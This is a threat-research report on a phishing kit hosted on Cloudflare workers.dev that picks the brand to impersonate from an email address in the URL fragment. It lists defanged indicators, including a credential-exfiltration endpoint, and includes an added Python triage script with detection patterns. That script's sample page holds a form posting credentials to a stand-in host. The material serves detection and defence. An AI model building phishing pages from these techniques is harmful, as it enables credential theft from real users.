Unmasking Cyber Deception: The Rise of Generic Phishing Pages Targeting Multiple Brands

CloudSEK's research uncovers a generic phishing framework capable of targeting multiple brands by leveraging customizable URLs to impersonate legitimate login pages. Hosted on Cloudflare's workers.dev, these phishing pages dynamically adapt by using targeted email domains to generate realistic backgrounds, deceiving users into surrendering credentials. The stolen data is exfiltrated to a remote server via obfuscated JavaScript. Organizations must enhance awareness through training, simulate phishing scenarios, and establish clear reporting protocols to mitigate risks and protect against evolving phishing threats.

Anshuman Das
January 24, 2025
Green Alert
Last update posted on January 24, 2025

Executive Summary

The CloudSEK Threat Research Team discovered a generic phishing page that can impersonate any brand using a generic login page to steal credentials. The phishing page is hosted using Cloudflare's workers.dev, a free domain name service. 

  • The generic-looking phishing page is hosted on this URL: workers-playground-broken-king-d18b.supermissions.workers.dev, which is designed to steal credentials from unsuspecting victims. 
  • Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.
  • The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io (a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users. 
  • Once the victim enters credentials to log in, their credentials are exfiltrated to a remote endpoint - hxxps://kagn[.]org/zebra/nmili-wabmall.php
  • The phishing page's DOM was obfuscated using JavaScript (filename: myscr939830.js) to evade detection from scam engines.

Analysis and Attribution

Technical Analysis of the Phishing Page

1. The generic-looking phishing page is hosted at workers-playground-broken-king-d18b.supermissions.workers.dev and is designed to steal credentials from unsuspecting victims.

Fig1. A Generic Looking Phishing Page to Steal Credentials

2. To turn the generic webmail login page into an impersonation of a specific brand, the scammer uses a crafted URL of this form: workers-playground-broken-king-d18b.supermissions.workers.dev/#[email protected]

Fig2. The generic phishing page turned into a fake Google login page

3. Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.

4. The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io (a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users.

Fig3. When the URL is crafted with an email address at the targeted brand's domain, the phishing site takes a screenshot of the legitimate website and uses it as the background

5. Once the victim enters credentials to log in, those credentials are exfiltrated to a remote endpoint: hxxps://kagn[.]org/zebra/nmili-wabmall.php

Fig4. Screenshot showing the exfiltration from the impersonated phishing page to a remote server controlled by the scammers

6. The phishing page's DOM was obfuscated using JavaScript (filename: myscr939830.js) [Fig5] to evade detection by scam engines. However, the JavaScript was not sophisticated and was easily deobfuscated. Once deobfuscated, the page's functionality could be verified from the source code.

Fig5. Obfuscated page source of the phishing page to evade detection

7. The code snippet in Fig6 prevents users from viewing the page source, a step that would otherwise help identify and block phishing attempts.

Fig6. Phishing attacks can be obfuscated by blocking the ability to view the page source

8. Below is the functionality in the deobfuscated source code demonstrating how a phishing page is dynamically generated using free services from thum.io and Google’s favicon fetcher endpoint.

Fig7. Dynamically generated background by abusing free services such as Google's favicon fetcher and thum.io
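Defender-side triage for the two tricks described above (the victim email carried in the URL fragment, steps 2 to 4, and the screenshot background, favicon fetch and view-source blocking in the deobfuscated page, steps 6 to 8), as an added example that is neither CloudSEK's code nor the kit's: it extracts the impersonated domain from a suspicious URL and lists the indicators found in a page's source. The thum.io and Google favicon URL shapes, the context-menu blocking pattern and the sample page are assumptions, not values taken from myscr939830.js.

```python
import re
from urllib.parse import urlsplit

# Free hosting suffixes named in the report; extend as new ones appear.
FREE_HOSTS = (".workers.dev", ".r2.dev")
EMAIL_RE = re.compile(r"^[\w.+-]+@([\w-]+(?:\.[\w-]+)+)$")

def triage_url(url):
    """Flag URLs that carry a victim email in the '#' fragment, the trick
    the kit uses to choose which brand to impersonate."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    host = (parts.hostname or "").lower()
    findings = []
    if host.endswith(FREE_HOSTS):
        findings.append("free-hosting")
    m = EMAIL_RE.match(parts.fragment)
    if m:
        findings.append("email-in-fragment")
        findings.append("impersonates:" + m.group(1).lower())  # brand domain
    return findings

# Source indicators. The thum.io and Google favicon URL shapes and the
# context-menu / F12 blocking pattern are assumptions about common kit
# code, not copied from myscr939830.js.
PAGE_INDICATORS = {
    "screenshot-background": re.compile(r"image\.thum\.io/get/", re.I),
    "favicon-fetch": re.compile(r"google\.com/s2/favicons\?domain=", re.I),
    "blocks-view-source": re.compile(r"contextmenu|keyCode\s*==\s*123", re.I),
}
OFFSITE_RE = re.compile(
    r"""(?:action\s*=|fetch\(|url\s*:)\s*['"]?https?://([^/'"\s]+)""", re.I)

def scan_page(html, page_host):
    """Return indicator names found in (deobfuscated) page source, plus any
    host other than page_host that a form or request is sent to."""
    hits = [name for name, rx in PAGE_INDICATORS.items() if rx.search(html)]
    for m in OFFSITE_RE.finditer(html):
        if m.group(1).lower() != page_host.lower():
            hits.append("posts-offsite:" + m.group(1).lower())
    return hits

# Constructed sample page with placeholder domains, not the real kit's.
SAMPLE_HTML = """
<body style="background:url(https://image.thum.io/get/https://example.com)">
<img src="https://www.google.com/s2/favicons?domain=example.com">
<form action="https://exfil.example.net/collect.php" method="post">
<script>document.addEventListener('contextmenu', e => e.preventDefault());</script>
"""
```

An email-in-fragment hit on free hosting is a strong signal on its own, because legitimate login pages do not select their branding from the URL fragment; the page-source indicators confirm the kit once the JavaScript has been deobfuscated.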

Attribution

1. Based on the similarity of the obfuscated JavaScript file, we have identified other phishing URLs employing the same tactics but hosted on Cloudflare's r2.dev: https://pub-3bb44684992b489e903bd3455d3b6513.r2[.]dev/WEBDATAJHNCHJF879476436743YREBHREBNFBJNFHJFEJERUI4894768467RYHGJGFHJGHJ.html

2. During a deeper analysis of the same JavaScript file (myscr939830.js), it was discovered that it is hosted on a free blockchain storage service, web3.storage.

3. The threat actor exfiltrated the stolen credentials to a remote server, kagn[.]org. This domain, controlled by the threat actor, was registered 6 years ago and is hosted on WordPress. The threat actor likely exploited a vulnerability and possibly backdoored the server at /zebra/nmili-wabmall.php.

Recommendations

  • Educate employees on how to identify and report phishing campaigns, focusing on the tactics used in generic phishing attacks.
  • Launch a D2C awareness campaign to educate customers on the risks of generic phishing attacks and the importance of remaining vigilant.
  • Implement a phishing simulation program to regularly test employees' ability to recognize and respond to phishing attempts.
  • Establish a clear process for reporting suspected phishing attacks, ensuring that employees know who to contact and how to provide relevant information.

Author

Anshuman Das

Threat Research @CloudSEK
